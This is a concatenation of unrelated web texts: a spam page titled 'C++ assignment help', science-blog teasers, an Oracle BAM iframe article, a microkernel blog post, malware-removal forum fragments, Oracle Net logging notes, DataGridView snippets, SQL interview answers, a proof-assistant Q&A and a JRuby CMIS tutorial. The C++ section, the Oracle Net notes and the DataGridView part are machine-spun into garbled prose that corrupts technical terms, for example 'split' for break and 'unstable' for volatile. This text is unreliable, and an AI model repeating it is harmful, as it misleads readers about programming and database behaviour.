Detailed Notes on C++ assignment help 30h Meteorology Fundamentals Meteorology is a fascinating topic. As a consequence of its very character, it is never consistent or monotonous. This system presents an summary of the fundamentals of electrical/electronic circuit Investigation, beginning with an outline of electrical theory and moving to uncomplicated circuit parts like electric power supplies, resistors, capacitors, and inductors. If you really need to break out a loop, a split is typically much better than possibilities such as modifying the loop variable or simply a goto: To the top of my know-how, There's not a very good certification application for C++ programmers. Which is a pity. A great certification software will be most practical. Multiparadigm programming is a flowery way of claiming ``programming working with multiple programming design and style, Each and every to its ideal result.'' One example is, using item-oriented programming when run-time resolution concerning diverse object kinds is needed and generic programming when static variety safety and operate-time performance is in a premium. Obviously, the primary strength of multiparadigm programming is in plans the place more than one paradigm (programming model) is applied, to ensure it would be difficult to obtain the identical effect by composing a method away from areas prepared in languages supporting distinct paradigms. I discover the most powerful cases for multiparadigm programming are found where by methods from diverse paradigms are Utilized in close collaboration to put in writing code which is additional sophisticated plus much more maintainable than will be doable within a single paradigm. With this lesson, We're going to consider electric power supplies (sources of voltage and existing) and introduce some quite simple circuits. 30 Whole Points No, sorry, I will not. You'll find The key reason why in the introductory notes of The Design and Evolution of C++: "Various reviewers requested me to compare C++ to other languages. This I've made a decision against executing. Therefore, I've reaffirmed a lengthy-standing and strongly held view: Language comparisons are almost never significant and also fewer generally good. A great comparison of major programming languages calls for a lot more effort and hard work than the majority of people are willing to spend, experience in a variety of application spots, a rigid servicing of a detached and impartial viewpoint, and a sense of fairness. I don't have enough time, and as the designer of C++, my impartiality would never be completely credible. I also concern yourself with a phenomenon I have regularly noticed in sincere attempts at language comparisons. The authors test hard to be impartial, but are hopelessly biased by focusing on just one software, one type of programming, or one society among the programmers. Worse, when just one language is considerably superior acknowledged than Other people, a subtle change in perspective occurs: Flaws inside the very well-identified language are deemed insignificant and straightforward workarounds are presented, While very similar flaws in other languages are deemed elementary. Until that you are producing the lowest level code manipulating components immediately, take into consideration unstable an esoteric feature which is ideal prevented. I opposed limits to C++ straight away when Erwin Unruh presented what on earth is widly considered for being the 1st template metaprogram to your ISO Benchmarks committee's evolution Performing team. To kill template-metaprogramming, all I might have had to do was to say very little. Instead my comment was together the lines "Wow, that is neat! We mustn't compromise it. It would establish handy." Like all powerful Concepts, template-metaprogramming is often misused and overused, but that doesn't indicate that the elemental idea of compile-time computation is bad. And like all powerfuls Suggestions, the implications and approaches emerged eventually with contributions from quite a few individuals. There is additional to scolarship than the usual think about the wikipedia, a quick Google-lookup, and several blog posts. There's far more to invention than giving a straightforward list of implications. Fundamental ideas and design and style tips are crucial. My Portion of the C++ design opened the likelihood for many to add, and if you look at my writings and publishing, you see that I test difficult to provide credit rating (e.g., begin to see the reference sections of my C++eleven FAQ) or perhaps the background sections of my books. And no, I am not a walking C++ dictionary. I don't preserve just about every technical depth in my head always. If I did that, I can be a Significantly poorer programmer. I his comment is here do hold the leading details straight in my head usually, and I do know exactly where to uncover the details when I want them. For instance: TC++PL the ISO C++ committee's home pages. isocpp.org. Why isn't going to C++ have garbage collection? Flag declaration of a C array inside a functionality or course that also declares an STL container (to stop abnormal noisy warnings on legacy non-STL code). To fix: At the very least change the C array into a std::array. if You can not Dwell which has a rule, object to it, dismiss it, but don’t water it down until finally it will become meaningless. Flag a parameter of a sensible pointer variety (a kind that overloads operator-> or operator*) that may be copyable/movable but hardly ever copied/moved from within the functionality human body, and that is hardly ever modified, and that's not handed together to another operate that might do this. Which means the possession semantics will not be employed. C++ is really a standard-objective programming language having a bias towards systems programming that is a greater C supports data abstraction supports object-oriented programming supports generic programming It is defined by an ISO conventional, offers stability around many years, and has a significant and energetic user Group. Obviously, that strongly will depend on Anything you previously know as well as your factors for Finding out C++. If you are a newbie at programming, I strongly propose you locate a highly trained programmer to help you. Usually, the unavoidable problems about language concepts and simple problems with the implementation you utilize can Amplify into serious frustrations. You'll have a textbook for Mastering C++. Here is the case even Once your implementation includes enough on-line documentation. The rationale is the fact that language and library documentation together with sample code aren't great instructors of concepts. Typically such resources are silent about why issues tend to be the way they are and what benefits you may be expecting (and which you should not count on) from a way. Concentrate on principles and strategies in lieu of language-technical specifics.
OPCFW_CODE
Science writing allows us to communicate science to the general public, but we can do more. Science art and other fields are moving us into a new revolution of science communication. Read on for the next frontiers of science communication. Cells can enter a dormant state called quiescence, and dormant cancer cells are resistant to chemotherapy and other treatments. A team led by UA Cancer Center researcher Guang Yao, PhD, has identified ways to regulate cell dormancy and “wake” these cells from their “slumber” to make them susceptible to cancer treatments. In part 3 of this series on alternative careers in science, we’ll focus on science communication. From public relations to medical writing, get all the details. When I started graduate school, I understood the science well, but was struggling to understand how to interpret results. Learning logic through programming helped. Here’s how. Afraid of authority? Stand up to authority with 3 steps to empowerment! Mental health issues impact my life as a PhD student as well as my future life as a scientist. Let’s talk about the impact these issues have and how we can create a community that fosters scientists who have chronic depression and anxiety. In science, we fail all the time. But we don’t talk about it nearly as much. Here’s what you need to know about failure in science. In a previous post, I talked about academia not being designed for people who have depression, anxiety, etc to succeed. I also spent some time talking about imposter syndrome. This particular post is the second in a series about careers other than being a research advisor (PI) or even being a researcher in industry. Part 2 in a 3 part series. There is a lot of discussion in science right now about diversity (though not nearly enough). I’d like to focus today on, 1) how I define diversity and 2) what diversity does for science. In a previous post, I talked about academia not being designed for people who have depression, anxiety, etc to succeed. I also spent some time talking about imposter syndrome. This particular post is the first in a series about careers other than being a research advisor (PI) or even being a researcher in industry. Part 1 in a 3 part series. When I was in film school, I remember one class being asked “Why do we make films?” and hearing many different responses. “But what about the audience?” my film professor asked. Many of the students in the class were baffled. They had never thought about important it was to effectively communicate their vision to the audience. “Race doesn’t exist.” I remember the first time I heard this. I was in my evolution class in undergrad. My professor pulled up a picture of two subspecies of bird. They looked exactly alike, and my professor mentioned that there is less genetic diversity between humans than between these two identical looking subspecies of bird. Then…
OPCFW_CODE
Oracle Business Activity Monitoring (BAM) is a powerful tool to create simple BI dashboards for data analysis. Although Oracle immensely improved BAMs look and feel by redesigning it using Oracle Application Development Framework (ADF) in version 12c, there might be situations in which an integration of single business views or dashboards into custom build JavaEE or ADF applications is required. For this purpose JDeveloper 11g provided the possibility to generate ADF data controls in order to access data structures defined in BAM 11g. As can be found within the „What’s New“ section in the BAM 12c documentation this feature was removed: Data control is no longer necessary or supported. If data controls are no longer necessary or supported, how is Oracle BAM dashboard integration achieved in 12c? This article will answer this question. As an example Oracle BAM 12c artefacts are integrated into a custom Oracle ADF application. Dashboard integration using iFrame Even though Oracle BAM 12c is ADF based, the only possibility to integrate its business views or dashboards into custom ADF or JavaEE applications is to load a dashboard in an iFrame. The hint to this preferred integration approach can be found in the following Oracle documentation section: You can use the URL to add a BAM dashboard link to a web page. For example: <iframe src=[DASHBOARD URL] width="100%" height="100%"> You can set the height and width attributes of the iframe. It was confirmed by Oracle that this is the preferred approach. On the one hand a positive aspect is that iFrames are a basic HTML feature and therefore can be used with any web application technology. On the other hand this approach introduces challenges such as Single-Sign-On (SSO), homogeneous layout and host application to BAM dashboard interaction. To start with the integration the BAM 12c dashboard URL is required. It can be obtained from within BAM 12c Designer by right clicking on the desired dashboard and selecting the “Show Dashboard URL” menu item. For this example the following dashboard URL will be used The second step is to create an ADF page and add the iFrame using the URL. In ADF the “Inline Frame” component is used to render an iFrame: In order to display the dashboard merely its “Source” property has to be configured: Afterwards the application can be deployed and the BAM 12c dashboard is displayed: Integrating Oracle BAM 12c artifacts, such as business views and dashboards, into custom web applications is a desirable feature, especially when developing applications using Oracle ADF. Currently the only documented approach is to integrate complete dashboards by rendering an iFrame referring to a dashboard URL. Although this simple approach works to some extend, it introduces additional challenges and problems. As BAM 12c is ADF based, implementing features for an easy but potent integration into custom ADF applications must be possible. Feasible approaches would be a data control approach, similar to the solution in BAM 11g, or a documented public API enabling direct access to BAM’s report cache bean. Hopefully, we will see such features in a not too far future. > Oracle Documentation – BAM 11g Data Controls > Oracle Documentation – BAM 12c „What’s New“ > Oracle Documentation regarding BAM 12c Integration > Oracle Business Activity Monitoring (BAM ) 12c Documentation > ADF Faces Rich Client Documentation – af:inlineFrame
OPCFW_CODE
Posted on | February 19, 2009 | 4 Comments Its been some years since the great debate between Linus Torvalds (and friends) vs Andy Tanenbaum on usenet. I’ve only linked the debate itself with an encyclopedic reference, the links to the debaters more or less point to individuals as they were when the great debate happened. If you are a sci-fi fan, you’ll realize that 2010 is soon upon us. If we go by Hollywood fiction, we should be sending a spacecraft to rescue a buggy HAL any day now. Yet, we’re still debating the design of kernels that support operating systems while cramming more cores into a single processor and milking threads for their entire worth. Fibril, did someone say fibril? Why do programmers cover their noses like someone passed gas when someone says fibril? Even Rusty produced the anti thread. I love Linux, I love working with Linux, I love developing software that works strictly on Linux (who loves portability kludges, please raise your hand?) and I love getting feedback from people all over the world who use my programs. Linux is a success because it is a tight knit, easy to debug, easy to learn kernel. Because GNU programs are so damn portable, Linux is a raging success. Hacking at Linux gives me the best of two worlds, studying very brilliant kernel developers (Linus and everyone else) while studying code that makes portability and standards compliance an art (GNU). And, (quote Arlo Guthrie) friends, GNU is a movement! You might not realize, if the GNU project had finished their kernel (the HURD) in the promised amount of time, Linus would have never started work on Linux. The problem is, microkernels are typically extremely hard to debug. Every file system (and most other things) that typically reside in ‘kernel space’ are run as a process. This presents interesting issues when all of the components of an operating system (file systems, watchdogs, etc) need to talk to each other. A great example of this problem can be summed up in a single funny question: Would you take a laxative and a sleeping pill at the same time? Then we have emerging microkernel based projects such as HelenOS that have been ported to so many architectures even when the component model was scarce .. and that solved the IPC race problems. Are we looking at an egregious mistake when developing for x86 then porting later, after the component model is in place? Are we blinded by the success of a single monolithic design (however brilliant) ? I will eagerly watch for and patch updates to my monolithic kernel that I use and love, however I don’t believe the monolithic design to be the end all of kernel architecture, despite the success of Linux. Xen is now usable, HelenOS is not. In a few years time, I suspect that both will be very usable and the ‘great debate’ will continue. Meanwhile, flames are welcome, that’s why I have a comment form.
OPCFW_CODE
Scroll down to where it says “The J2SE Runtime Environment (JRE) allows end-users to run Java applications”. Diagnostic parameters are found in the following configuration files: sqlnet.ora for clients. By default the log name is sqlnet.log. Evaluating this information will help you to diagnose and troubleshoot network problems. If that error does not provide the information, then review the next error in the log until you locate the correct error information. A failure produces a code that maps to an error message. By default the server directory is ORACLE_HOME/network/log. Action: Correct the protocol address. Back to top Back to Virus, Trojan, Spyware, and Malware Removal Logs 0 user(s) are reading this topic 0 members, 0 guests, 0 anonymous users Reply to quoted postsClear BleepingComputer.com Installed Oracle Net naming methods are: Local Naming (tnsnames.ora) Oracle Directory Naming Oracle Host Naming NIS Naming The net service name given in the connect string should be defined for at WARNING: Subscription for node down event still pending The listener cannot receive the ONS event while subscription is pending. If you determine the problem is a data volume issue, then try to transfer a large (5 MB) file with the base connectivity. LOG_FILE_CLIENT Client Information: Log File The name of the log file for the client. computer is working great. Possible reasons include: The maximum number of processes allowed for a single user was exceeded The listener does not have execute permission on the Oracle program The associated Microsoft Windows service Join thousands of tech enthusiasts and participate. Please try the request again. The DIAG_ADR_ENABLED parameter indicates whether ADR tracing is enabled. cman.ora for connection managers. cman.ora Log Parameters Table 16-13 describes the log parameters settings that can be set in the cman.ora file. Other ADRCI command options are available for a more targeted Oracle Net trace file analysis. http://newwikipost.org/topic/F8KkzyqWU7NXf89NtNO1x3PV4lBHZ2Ye/HP-Scan-problem.html Under ‘Scanner Logs’ double click on ‘SuperAntiSpyware Scan Log’. For example, you can configure parameters for access rights in the sqlnet.ora file. Now click the Run Scan button on the toolbar. Then from your desktop double-click on jre-6u2-windows-i586-p.exe to install the newest version. Click the red Moveit! Click the Logging and Tracing tab. Staff Online Now crjdriver Moderator etaf Moderator Keebellah Trusted Advisor Advertisement Tech Support Guy Home Forums > Security & Malware Removal > Virus & Other Malware Removal > Home Forums Forums Join our site today to ask your question. If the net service name in the connect string is simple, then check the NAMES_DEFAULT_DIRECTORY parameter in the sqlnet.ora file. During that time the application will still show on the screen. Close any programs you may have running – especially your web browser.8. If an error occurs, then applications such as SQL*Plus, that depend on network services from Oracle Net Services, normally generate an error message. The TNSPING utility works like the TCP/IP PING utility and does not create and open a socket, nor does it connect with the listener. This section contains the following topics: sqlnet.ora Log Parameters listener.ora Log Parameters cman.ora Log Parameters Setting Logging Parameters in Configuration Files See Also: Oracle Database Net Services Reference for additional information Example 16-5 Listener Log Events for a Successful Connection Request 14-MAY-2009 15:28:58 * (connect_data=(service_name=sales.us.example.com)(cid=(program=)(host=sales-server) (user=jdoe))) * (address=(protocol=tcp)(host=192.168.2.35)(port=41349)) * establish * sales.us.example.com * 0 Example 16-6 shows a log file excerpt with If an update is found, it will download and install the latest version. Understanding Error Stack Messages Suppose that a user of a client application tries to establish a connection with a database server using Oracle Net and TCP/IP, by entering the following commands: button. Check any item with Java Runtime Environment (JRE or J2SE) in the name. – Examples of older versions in Add or Remove Programs:Java 2 Runtime Environment, SE v1.4.2J2SE Runtime Environment 5.0J2SE This parameter accepts the following values: INIT_AND_TERM: initialization and termination MEMORY_OPS: memory operations CONN_HDLG: connection handling PROC_MGMT: process management REG_AND_LOAD: registration and load update WAKE_UP: events related to CMADMIN wakeup queue Advertisement stefan1031 Thread Starter Joined: Jun 15, 2008 Messages: 4 I am having problems with cid pop-ups. button A list of tool components used in the Cleanup of malware will be downloaded. NS Network Session (main and secondary layers).
OPCFW_CODE
ryder wright rodeo transport driver resume To add the custom column to your DataGrid, add DataGridNumericUpDownColumn under the MahApps namespace to your DataGrid. Columns property that provides DataContext of the DataGrid is ViewModel. Reordering: Allows drag and drop of any column anywhere in the grid’s column header row, thus allowing repositioning of columns.. (The column chooser select popup does not hide You can select the column type based on the data that you wish to display/edit Column hiding doesn't work with minWidths The data is loaded into datagrid via a WebApi I've created update_ column update_ column . Our DataGrid UI component manages its edit state automatically Titled("Marital status.. To programatically add a column: DataGridTextColumn textColumn = new DataGridTextColumn (); textColumn.Header = "First Name"; textColumn.Binding = new Binding ("FirstName"); dataGrid.Columns.Add (textColumn); Check out this post on the WPF DataGrid discussion board for more information. Reply ↓. DataGridView1.Columns.Add ( "NameOfColumn", "Coulumn Heading Text") But that may cause problems if you add rows and try to save it / update the source later. You can also do it by addit it to the underlying DataTable: Copy Code Dim dt As DataTable = TryCast (DataGridView1.DataSource, DataTable) dt.Columns.Add ( "Rating" ) which may work better. DataGridViewのColumns.Addにより、作成した列をDataGridViewに追加する。 以下の例では、DataGridViewのDataSourceプロパティにデータソースを設定した時に列が自動的に追加されないようにして、その後"Column1"列を手動で追加しています。. It is so easy.. I think that you need to specify what type of cell the column will contain. DataGridViewColumn newCol = new DataGridViewColumn (); // add a column to the grid DataGridViewCell cell = new DataGridViewCell (); //Specify which type of cell in this column newCol.CellTemplate = cell; newCol.HeaderText = "test2"; newCol.Name = "test2. dog starvation symptoms Add (new DataGridComboBoxColumn (ref tblStates, 0, 0, true, false, false)); // Datagrid ComboBox DisplayMember field has order number 0. Name of this column is "State". // Datagrid ComboBox ValueMember field has order number 0. It is the same column like for DisplayMember. Go to tool box and click on the DataGridview option the form will be open. DataGridViewLinkColumn Class: Represents a column of cells that contain links in a DataGridView control. If the status is not set to "Available", we can change the cell style to make it look like a textboxcell. But when you move mouse to hover the cell content, it will show a hand cursor. That is not very friendly because there is nothing to show. To programatically add a column: DataGridTextColumn textColumn = new DataGridTextColumn (); textColumn.Header = "First Name"; textColumn.Binding = new Binding ("FirstName"); dataGrid.Columns.Add (textColumn); Check out this post on the WPF DataGrid discussion board for more information. Reply ↓. How can i bind data to a datagridview combobox column I have a datagridview one with combobox column and second with textbox column.Pls help me to bind d. I'll cover the following topics in the code samples below: SqlDataAdapterPage, XML Converter, EventHandler, BindingList, and DataTable. ... Thereafter you can assign this to datagridview cell. DataGridViewColumn Applies to .NET Framework 4.8 and other versions Add (String, String) Adds a DataGridViewTextBoxColumn with the given column name and column header text to the collection. C# Copy public virtual int Add (string columnName, string headerText); Parameters columnName String The name by which the column will be referred. headerText. seiko chronograph 100m The WPF DataGrid control is used for efficiently displaying and manipulating tabular data. Its rich feature set includes functionalities like data binding, editing, sorting, filtering, grouping, and exporting to Excel and PDF file formats. It has also been optimized for working with millions of records, as well as handling high-frequency, real. MUI DataGrid Auto Column Width If you want columns to automatically adjust their width to fill the DataGrid's container, use a combination of minWidth and flex. This provides a minimum structure to your column if you add more columns in the future. It also stretches all the columns that have a flex value, if there is room to stretch. how to frame a bay window sweet rib rub recipe
OPCFW_CODE
For formal proofs of graph structures and algorithms, which proof assistant should I learn? My goal is to be able to make formal proofs for graph structures and algorithms, proving i.e. for every vertex in a directed-acyclic-graph there exists a path from a source vertex to that vertex, or i.e. proving the correctness of binary search on a sorted list. For this, would you recommend learning Coq, Lean, Isabelle, or any others? I recently started learning Coq, up to the point of proving basic boolean logic, working with lists via the (front :: rest) constructor, and basic induction proofs on the natural numbers. I've heard of Isabelle and Lean, I've just tried a few tutorials propositional statements in Lean. So far, it feels nothing like the informal proofs for discrete algorithms that I had to do in my college classes. Most of the tutorials I find on the internet for Coq/Lean/Isabelle do stuff with propositional logic or number theory. I haven't gotten to the point where I would even know how to define what a vertex/edge is in Coq. I might write a longer answer, but the short version is: All three should be ok. There are many ways to define graphs in theorem proving (just like there are many ways to code graphs in a program). If your theorem requires a lot of fancy background, you may need to build off of existing work. Otherwise all the theorem provers should be fine for graph theory. As for binary search, any theorem prover should be able to prove this without issue. But note that lists are linked lists, so binary search wouldn’t be efficient. Lean also has arrays with efficient access. Functional Programming in Lean (https://lean-lang.org/functional_programming_in_lean/) works up to proving merge sort in the end, which is similar to the kind of stuff you want to prove. But again, there are likely similar resources in Isabelle or Lean. Again your theorems don’t really require specialized tools, it is just a matter of learning the language well enough to prove them. "I haven't gotten to the point where I would even know how to define what a vertex/edge is in Coq." I think you could do this in multiple ways (adjacency matrices, relations, adjacency lists) with several possible implementation details. Unfortunately, I don't think we know what is the "best" way. See this related question for how to define a graph in Lean: https://proofassistants.stackexchange.com/questions/1698/making-a-finite-graph-type-in-lean-introduction-rule I believe both Lean and Isabelle are good candidates for formalizing your proofs of algorithms on graphs. Here are some entry points for both assistants. A simple natural language query using Moogle leads you to the Mathlib documentation on undirected graphs. A good introductory reading on defining mathematical structures on is the Mathematics in Lean book. If you need something more basic, you could check The Mechanics of Proof; this one actually contains some material on relations and graphs. On the other hand, an analogous query on Isabelle's Archive of Formal Proofs returns many formalizations of graph algorithms; for instance, the fifth hit is Kruskal's Algorithm for Minimum Spanning Forest. There actually are lists by topic, the one for graphs being this one. Hope these pointers are helpful. All three proof assistants you mention should do the job pretty well. There are two main aspects that should guide your choice: the availability of libraries that would provide you with already existing definitions and lemmas your familiarity and affinity with one or the other system. I can't say for the latter, but since you mention you are already learning Coq, there is a significant amount of graph theory developed there. I think the most advanced project there is this one, which as far as I know embeds results from the Four Color Theorem formalisation, as well as enough graph theory to support the formalisation of multiple other graph theory paper. So there should be more than enough available for you there. Matthew Daggitt has a significant library of programs and proofs about network routing problems in Agda. I have not used it, but maybe it could serve as a basis or inspiration for your own developments.
STACK_EXCHANGE
No successful redirect to "routeAfterAuthentication" after login I have the issue that after the login there is an attempt to redirect to the defined routeAfterAuthentication ('main-app.inbox') but this takes forever (loading route appears). The login, however, is successful because after a manual reload I find myself on the correct page. This is the relevant part of the content of my environment.js: ENV['ember-simple-auth'] = { baseURL: '', authenticationRoute: 'frontpage.login', routeAfterAuthentication: 'main-app.inbox', routeIfAlreadyAuthenticated: 'main-app.inbox', }; I'm taking a dummy authenticator right now: import Ember from 'ember'; import Base from 'ember-simple-auth/authenticators/base'; const { RSVP } = Ember; export default Base.extend({ restore(data) { return RSVP.resolve(data); }, authenticate(data) { return RSVP.resolve(data); }, invalidate() { return RSVP.resolve(); } }); The login component looks like this: import Component from '@ember/component'; import { inject as service } from '@ember/service'; export default Component.extend({ classNames: ['login'], session: service('session'), routing: service('-routing'), actions: { login() { var login = this; this.get('session').authenticate('authenticator:custom'); } } }); router.js: Router.map(function() { this.route('frontpage', function() { this.route('signup'); this.route('login'); }); this.route('main-app', function() { this.route('inbox'); this.route('usersettings'); }); this.route('loading'); this.route('main-app', { path: '/*main-app' }); // Catch everything else! }); Version of esa: "ember-simple-auth": "^1.4.0" ember --version: ember-cli: 2.16.2 node: 8.7.0 os: darwin x64 to redirect to the defined routeAfterAuthentication ('main-app.inbox') but this takes forever (loading route appears). The login, however, is successful This sounds to me like something is going wrong in the main-app.inbox route. Have you tried debugging its beforeModel/model/afterModel methods? Thanks for your advice. I just debugged it and found out: as long as I have a promise in the model()-function in the route, the redirect fails. If I, for example, just return []; in the model()-function, it works. I noticed that the failing redirect is only a symptom. Even if I manage to make the redirect work when I return an empty array, I can not follow a link to a different route (example: 'main-app.inbox'). If I reload the site (and the session is restored), everything works. So concluded: If I manage to login I can not open any route that fetches a model and returns a promise (until I refresh) If I login and reload the page afterwards (using refresh in the browser) which causes the session to be restored, everything works. It seems like some problem with unfulfilled promises or something. I notice, however, that the request that was originally in the model()-function goes out and successfully receives data so the promise should resolve. …so the promise should resolve. I'd check whether it actually resolves Okay I found out that the promise neither resolves nor rejects because the handlers had not been registered. That is because the simple-auth-service inits all services during the session restoration (see https://imgur.com/5G9OOo9). I expected a certain service (the one that connects to the backend via websocket) to be initiated later on. Conclusion: Not directly related to simple-auth. However it has to be kept in mind that during session restoration all services seem to be initiated which can influence the original flow. Thanks for your help.
GITHUB_ARCHIVE
M: The Medieval Origins of the Modern Footnote - benbreen http://medievalbooks.nl/2014/12/19/the-medieval-origins-of-the-modern-footnote/ R: wtbob It's fascinating to think of the mediæval scribal system as a really, really low-bandwodth Wikipedia, with thousands of men over centuries passing notes and slowly developing the corpus of information which underlies of modern civilisation. Who were those scribes who wife each of those letters with a precision which would be the envy of an 80s dot-matrix printer? What were their hopes and dreams? Could they have imagined an age like ours? R: slvv Erik Kwakkel is awesome. For more on the history of footnotes, check out Anthony Grafton's The Footnote: A Curious History ([http://www.amazon.com/The- Footnote-A-Curious-History/dp/0674...](http://www.amazon.com/The-Footnote-A- Curious-History/dp/0674307607)) There's also Chuck Zerby's book, The Devil's in the Details. R: benbreen I love Anthony Grafton! He's basically the last of the 17th century polymathic scholars, which is fitting because that's precisely what he studies. Academics have recently been having a debate about putting footnotes online which seems apropos here: [https://chroniclevitae.com/news/665-wait-your-footnotes- are-...](https://chroniclevitae.com/news/665-wait-your-footnotes-are-in- cyberspace) R: walterbell A centralized URL is likely to go offline long before all decentralized physical copies of a book. A scholarly article without footnotes is like source code without git/mercurial history. Like the long tail in search, it's not about frequency of access, but the force of accountability that footnotes exert upon the main text.
HACKER_NEWS
I paid a developer to write the Moj.io binding, but Moj.io decided to update their API so it no longer works. My question is, should I find another developer to update the binding or are there newer devices out there? Looking for the ability to track 5 cars with as frequent updates as possible when moving. If I also am able to read fule, and other car data the better, but basically I just want to track them. Today I am using the original Moj.io ODB-II adapters that they used to sell, but I understand now they work with other adapters. It looks like from the moj.io website that they are not in the personal space anymore so that is partly why I am wondering if I should find someone to pay to update the mojio binding or pick new hardware. I believe that most - or even all - of those adapters are just standard OBD-II devices with either a bluetooth link or like the moj.io and Telekom ones to have a GPS tracker and mobile network HW and a SIM card included. If it’s just about location tracking, you could put an old smartphone into the car and use owntracks. If you want to obtain car data, too, you might rather like to go for a generic solution to work without moj.io. I would not expect them or any other company to support an open API in the long run. Have a look at this old thread and the links in there. Maybe you could get your developer to use that as a basis for your next-gen solution (it would rather be an app than a binding, upstreaming the data using MQTT) to work on a generic level (i.e. it’s supposed to work with any of those OBD-II devices). And if you then were willing to even share it with the openHAB community, that I would be a great gift. Just to put this out there: I would also be very much interested in a solution for this use case! I am currently using the https://www.pace.car/en solution but they do not offer an official interface. (The service is still young and I can’t fully recommended it) @ThomDietrich I think the adapter will be the same…my understanding was that the telekom is a sales partner of moj.io and they will have an own app for the special telekom odb2 adapter…but when i visit the moj.io website i see no option to buy a adpter?! That’s basically my idea and recommendation, too. A generic OBD-II bluetooth adapter plus no Pi but a cheap or used smartphone to have BT, GPS and SIM/GSM. Permanently install that into the glove locker and attach it to your USB there to get its battery charged at any time. Now ‘all’ we need is an Android app to read data via BT from the OBD adapter, to decode and turn it into preferrably MQTT or HTTP to be sent over the mobile network to some cloud or home server. If someone came up with a device to combine those two, that’s also fine. But at least as of today, there do not seem to be generic (“open”) combined devices available. Those available (like moj.io) are not open - you can only use them indirectly by subscribing to the service that that company offers. And any company to offer that bundle (like moj.io or also pace.car) tries to make money with providing that service or app. That comes at a price, literally and figuratively. Even if you’re fine with paying the price for the service (and not every smarthome user is), you’re always at risk of that company to change anything (as Nathan just experienced), to provide a bad service (outages, data disclosure, …) or to stop providing the service at any time e.g. when they have to go out of business. That being said, @sipvoip and all, please have another look at the links from my last post if they could become a basis for that undertaking. Yep sadly, I’ve registered for the newsletter to get notified as soon as a preorder is possible. While browsing the feature list, I realized that they put a strong focus on triggers, actions and general integration. I wonder if they are interested to push that level forward. If so maybe they will provide hardware and/or support for someone wanting to integrate openHAB @sipvoip maybe that’s an option for you (and us) Btw. Their website is amazing. Marketing done right.
OPCFW_CODE
2 What is Cursor? How to use a Cursor? A database cursor is a control structure that allows for the traversal of records in a database. Cursors, in addition, facilitates processing after traversal, such as retrieval, addition, and deletion of database records. They can be viewed as a pointer to one row in a set of rows. Working with SQL Cursor: What can you tell about WAL (Write Ahead Logging)? Write Ahead Logging is a feature that increases the database reliability by logging changes before any changes are done to the database. This ensures that we have enough information when a database crash occurs by helping to pinpoint to what point the work has been complete and gives a starting point from the point where it was discontinued. For more information, you can refer here. How to delete a column in SQL? To delete a column in SQL we will be using DROP COLUMN method: We will start off by giving the keywords ALTER TABLE, then we will give the name of the table, following which we will give the keywords DROP COLUMN and finally give the name of the column which we would want to remove. Explain Equi join with an example. When two or more tables have been joined using equal to operator then this category is called an equi join. Just we need to concentrate on the condition is equal to (=) between the columns in the table. 1 What is an Index? Explain its different types. A database index is a data structure that provides a quick lookup of data in a column or columns of a table. It enhances the speed of operations accessing data from a database table at the cost of additional writes and memory to maintain the index data structure. There are different types of indexes that can be created for different purposes: Unique indexes are indexes that help maintain data integrity by ensuring that no two rows of data in a table have identical key values. Once a unique index has been defined for a table, uniqueness is enforced whenever keys are added or changed within the index. Non-unique indexes, on the other hand, are not used to enforce constraints on the tables with which they are associated. Instead, non-unique indexes are used solely to improve query performance by maintaining a sorted order of data values that are used frequently. Clustered indexes are indexes whose order of the rows in the database corresponds to the order of the rows in the index. This is why only one clustered index can exist in a given table, whereas, multiple non-clustered indexes can exist in the table. The only difference between clustered and non-clustered indexes is that the database manager attempts to keep the data in the database in the same order as the corresponding keys appear in the clustered index. Clustering indexes can improve the performance of most query operations because they provide a linear-access path to data stored in the database.
OPCFW_CODE
How to upload multiple files to a CMIS repository using JRuby Jeff Potts recently posted an article that showcases how you can upload multiple files to a CMIS repository using Java. I thought it would be a nice idea to write a similar article but using JRuby instead. What is CMIS? CMIS stands for Content Management Interoperability Services and it’s basically a standardized API that let’s you perform CRUD operations against a CMIS compliant server. More information about the specification can be found here. Recently, Jeff Potts also wrote a really good article that introduces CMIS. Here are a few CMIS-compliant content repositories: What you need First off, you need to install a CMIS repository on your system. In this article I’m going to use Alfresco 4.2.c Community Edition. Instructions on how to download and install Alfresco can be found here Then you need to install JRuby on your system. I’m using rbenv to manage different Ruby implementations on my Mac. I won’t go in to the details on how to get JRuby running on your system. Just search on Google if you don’t know how to setup JRuby. When you have JRuby setup on your system you can install the CMIS gem that we need: The CMIS gem is a CMIS client for JRuby. This gem uses the Apache Chemistry OpenCMIS Java libraries under the hood. I’m the author of this gem so if it doesn’t work as expected for you, blame me :-) Create a session The first thing you need to do is to create a session: As you can see, creating a session is very simple and straightforward. You only have to specify a username, password and the URL to the CMIS endpoint. CMIS does support both Atom Pub binding and Web Services binding. However, the JRuby gem only supports the Atom Pub binding which is faster than the SOAP Web Services binding and usually it’s a better choice. SOAP just sucks anyway so I won’t bother implementing support for it in the CMIS gem. Most CMIS servers only provides one repository by default that you can connect to and the code above automatically connects to the first repository that it finds. This is a different behavior compared to the OpenCMIS library where your need to specify a repository explicitly every time you want to connect to a repository. I’ve chosen to implement this behavior to make it a little bit more convenient to work with the gem. However, you can specify a different repository if you want to in JRuby. You can read about it in the documentation for the CMIS gem. Create the target folder So now we got a session to work with. CMIS repositories is represented as a hierarchical tree of object consisting of folders and documents just like a local file system. The example below gets the root folder of the repository and creates a new folder called Images in the root folder. We also store a reference (image_folder) to the new folder so we can use it later: Now that we got a newly created folder, we can start to upload images to the folder: To upload the images we just call the create_cmis_document method on the folder object and we pass in the name of the file and the full file path. Then we store the new object id in a variable so we can grab the image object from the repository using the get_object method on the sesssion. List the uploaded files To list the new files in our image folder we can execute the following code: First I’m just showcasing another way to get an object by using the get_object_by_path method. Then I’m just grabbing the children from the image folder and then I print out the name of the file. This is just a very simple example of what you can do with the OpenCMIS library and the CMIS gem in JRuby. Please let me know if you build something more interesting with the CMIS gem! The complete code example can be found here.
OPCFW_CODE
